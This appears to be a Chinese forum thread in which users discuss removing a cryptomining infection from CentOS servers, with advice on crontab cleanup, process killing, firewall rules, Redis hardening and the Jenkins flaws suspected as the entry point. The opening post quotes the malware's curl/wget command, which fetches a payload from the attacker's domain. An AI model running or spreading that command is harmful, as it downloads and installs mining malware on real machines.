内网服务器中了挖矿病毒 curl -fsSL -m180 lsd.systemten.org||wget -q -T180 -O- lsd.systemten.org 使用网上教程
https://www.cnblogs.com/kobexffx/p/11000337.html 依然不能解决问题
大家有啥好的解决办法么,现在除了重装系统 我想不到其他好的办法了
防火墙限制域名访问,限制端口访问
你先看 crontab -l 里面有没有定时任务,如果有先删了,然后去找进程,看下有没有守护进程,如果有先杀,杀完以后在下次检查前删除脚本,脚本复制下来当备忘,应该就杀干净了 顺带记得提高 redis 的安全性,这玩意儿经常被 arp 打 别的改了什么就恢复什么就行了= =反正中毒挺蛋疼的
直接重装了,比较蛋疼,杀了几遍了还是没弄干净,配置低的服务器直接就进不去了,最后就是想办法把文件 cp 出来重装了
https://www.cnblogs.com/kobexffx/archive/2019/06/14/11000337.html
我就是照着这个做的,但是没杀干净
那就不知道了,哈哈,挖矿很难搞
遇到过,没杀干净,最后备份数据重做系统了,你们那台服务器装了 jenkins 么。。。我们中挖矿病毒是因为 jenkins 老版本安全漏洞。。
jenkins redis 都有 哈哈哈,反正除了一台 mac 和一台 win 其他的 5 台 centos 系统的服务器全都挂了
https://cloud.tencent.com/act/cps/redirect?fromSource=gwzcw.3018172.3018172.3018172&redirect=10140&cps_key=1941cbd3d7c4cd819b0d6629831ba208&from=activity